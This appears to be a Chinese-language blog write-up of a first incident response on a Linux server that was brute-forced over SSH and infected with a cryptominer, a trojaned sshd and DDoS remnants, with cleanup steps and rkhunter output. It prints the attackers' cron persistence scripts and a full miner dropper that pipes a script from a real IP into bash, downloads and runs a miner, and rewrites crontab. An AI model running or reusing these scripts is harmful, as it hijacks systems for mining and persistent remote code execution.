一次应急病毒清除记录

概述：

9.4号临时接到通知让一个人去应急，第一次应急，比较虚，到客户那里了解了一下情况。主要现象是流量异常，CPU占用过高。

发现连接数超多-17779，然后在试图连接其他主机的22端口

发现异常进程，当初进行杀死之后，从九点到晚上十点cpu都是正常的，然后上午通过查看日志last，lastb，cat /etc/passwd等未找到实际的病毒等。

但发现是9.1号18.38分通过远程暴力破解成功后进行种植定时任务，种植病毒进行远程挖矿。

安装计划任务

上午查看cat /etc/crontab 发现有个gcc.sh脚本，

*/3 * * * * root /etc/cron.hourly/gcc.sh

当时以前只是C的环境所需要的，因为经验不足，下午才意识到打开查看

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

网上进行查询该脚本信息，居然发现13年有同样案例，然后按照案例进行执行，到最终删除脚本

删除脚本时每删除一次，就会再生另一个名称的脚本

采用chattr与lsattr使用来限制目录修改权限

脚本内容

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
cp "/bin/noguzgti" "/bin/zjtrxnfwyt"
"/bin/zjtrxnfwyt"

病毒一排查杀除

1.使用 top 查看病毒为mtyxkeaofa，id 為 16621，不要直接杀掉程序，否则会再生，而是停止其运作。

[root@deyu ~]# kill -STOP 16621

2.刪除 /etc/init.d 內的档案。

[root@deyu ~]# find /etc -name '*mtyxkeaofa*' | xargs rm -f

3.刪除 /usr/bin 內的档案。

[root@deyu ~]# rm -f /usr/bin/mtyxkeaofa

4.查看 /usr/bin 最近变动的文件，如果是病毒也一并刪除，其他可疑的目录也一样。

[root@deyu ~]# ls -lt /usr/bin | head

5.现在杀掉病毒程序，就不会再生。

[root@deyu ~]# pkill mtyxkeaofa

6.刪除病毒本体。

[root@deyu ~]# rm -f /lib/libudev.so、

以上是删除的第一个病毒。

2.再次排查

后来经过chkrootkit，rkhunter --check进行查杀，对waring进行记录

[14:47:59] Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: a /usr/bin/perl -w script text executable
[14:48:00] Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne-Again shell script text executable
[14:48:01]   /usr/bin/ssh                                    [ Warning ]
[14:48:01] Warning: File '/usr/bin/ssh' has the immutable-bit set.
[14:48:02] Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: POSIX shell script text executable
[14:48:07] Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again s
hell script text executable
[14:48:07] Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable

[14:49:17]     Checking for string '/usr/include/openssl'    [ Warning ]
[14:49:25]     Checking for string 'backdoor.h'              [ Warning ]
[14:49:25]     Checking for string 'backdoor_active'         [ Warning ]


Warning: Checking for possible rootkit strings    [ Warning ]
[14:49:26]          Found string 'backdoor.h' in file '/usr/sbin/sshd'. Possible rootkit: Trojaned SSH daemon
[14:49:26]          Found string 'backdoor_active' in file '/usr/sbin/sshd'. Possible rootkit: Trojaned SSH daemon
[14:49:26]          Found string '/usr/include/openssl' in file '/usr/sbin/sshd'. Possible rootkit: Trojaned SSH daemon
[14:49:26]          Found string 'backdoor.h' in file '/usr/bin/ssh'. Possible rootkit: Trojaned SSH daemon
[14:49:26]          Found string 'backdoor_active' in file '/usr/bin/ssh'. Possible rootkit: Trojaned SSH daemon
[14:49:26]
[14:49:26] Info: Starting test name 'malware'
[14:49:26] Performing malware checks
[14:49:26]
[14:49:26] Info: Test 'deleted_files' disabled at users request.
[14:49:26]
[14:49:26] Info: Starting test name 'running_procs'
[14:49:28]   Checking running processes for suspicious files [ None found ]

Info: Rkhunter option ALLOW_SSH_ROOT_USER set to 'no'.
[14:49:46] Info: Rkhunter option ALLOW_SSH_PROT_V1 set to '0'.
[14:49:46]   Checking if SSH root access is allowed          [ Warning ]
[14:49:46] Warning: The SSH configuration option 'PermitRootLogin' has not been set.
           The default value may be 'yes', to allow root access.
[14:49:46]   Checking if SSH protocol v1 is allowed          [ Warning ]


Info: Starting test name 'system_configs_syslog'
[14:49:46]   Checking for a running system logging daemon    [ Found ]
[14:49:46] Info: A running 'rsyslog' daemon has been found.
[14:49:46] Info: Found an rsyslog configuration file: /etc/rsyslog.conf
[14:49:46]   Checking for a system logging configuration file [ Found ]
[14:49:46]   Checking if syslog remote logging is allowed    [ Not allowed ]


[14:49:46] Info: SCAN_MODE_DEV set to 'THOROUGH'
[14:49:50]   Checking /dev for suspicious file types         [ Warning ]

[14:49:51]   Checking for hidden files and directories       [ Warning ]
[14:49:51] Warning: Hidden directory found: /dev/.mdadm
[14:49:51] Warning: Hidden directory found: /dev/.udev
[14:49:51] Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
[14:49:51] Warning: Hidden file found: /usr/share/man/man5/.k5identity.5.gz: gzip compressed data, from Unix, max compression
[14:49:51] Warning: Hidden file found: /usr/share/man/man5/.k5login.5.gz: gzip compressed data, from Unix, max compression
[14:49:52] Warning: Hidden file found: /usr/bin/.fipscheck.hmac: ASCII text
[14:49:52] Warning: Hidden file found: /usr/bin/.ssh.hmac: ASCII text
[14:49:52] Warning: Hidden file found: /usr/sbin/.sshd.hmac: ASCII text

对有问题的文件进行拷贝下来，上传到https://www.virustotal.com/进行查杀，发现ssh被替换为后门，然后通知客户进行ssh卸载

至此ssh后门清除，以及/bin目录下很多DDOS留下的残余文件清除！

3.病毒3排查

另外发现执行的异常进程文件

#!/bin/sh
# chkconfig: 12345 90 90
# description: tilmtcfhca
### BEGIN INIT INFO
# Provides:		tilmtcfhca
# Required-Start:	
# Required-Stop:	
# Default-Start:	1 2 3 4 5
# Default-Stop:		
# Short-Description:	tilmtcfhca
### END INIT INFO
case $1 in
start)
	/usr/bin/tilmtcfhca
	;;
stop)
	;;
*)
	/usr/bin/tilmtcfhca
	;;
esac　

原本以为这样就结束了，差不多可以了，本来我也没有处理经验，然后cpu正常，但是没有太关注连接数。

第三天发现又有异常进程在运行，CPU占用百分之百啊，请教同事后crontab -e 查看定时任务

（系统级的）做系统级配置会直接配置 /etc/crontab

          修改/etc/crontab只有root用户能用，更加方便与直接直接给其他用户设置计划任务，而且还可以指定执行shell等等，

（用户级）某用户可以自行配置 crontab -e所有用户都可以使用，普通用户也只能为自己设置计划任务。然后自动写入/var/spool/cron/usename

发现有一定时任务，

"* * * * * curl -s http://23.94.196.251/log7.jpg | bash -s"

访问下载一站点图片，图片其实是一个bash脚本

#!/bin/sh
pkill -f suppoie
pkill -f cnrig
pkill -f .xm.log
pkill -f xmrig64
ps aux | grep -vw sshd64 | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
rm -fr /usr/log
rm -fr /var/log/log
rm -fr /var/log/pr
mkdir /usr/log
ps -fe|grep -w sshd64 |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && 
echo "* * * * * curl -s http://23.94.196.251/log7.jpg | bash -s" >> /tmp/cron || true && 
crontab /tmp/cron || true && 
rm -rf /tmp/cron || true && 
curl -o /usr/log/config.json http://23.94.196.251/c.jason
curl -o /usr/log/sshd64 http://23.94.196.251/sshd64
chmod 777 /usr/log/sshd64
chmod 777 /usr/log/config.json
cd /usr/log
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sshd64 -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "Runing....."

并且在大佬的协助下pstree 查看进程树

杀死残余进程，然后之后sshd卸载，过了两天观察情况，一切正常运行，进行了ssh重装，端口修改为非默认，减少了一定暴力猜解口令的攻击，并限制内网访问，自此一次应急基本结束

总结：此次病毒产生由于暴力猜解成功后，进行定时任务安装，种了三种木马 挖矿、ddos、还有个跑弱口令的。第一次的应急，太多瞎摸索，还有很多不理解，，希望大佬指点。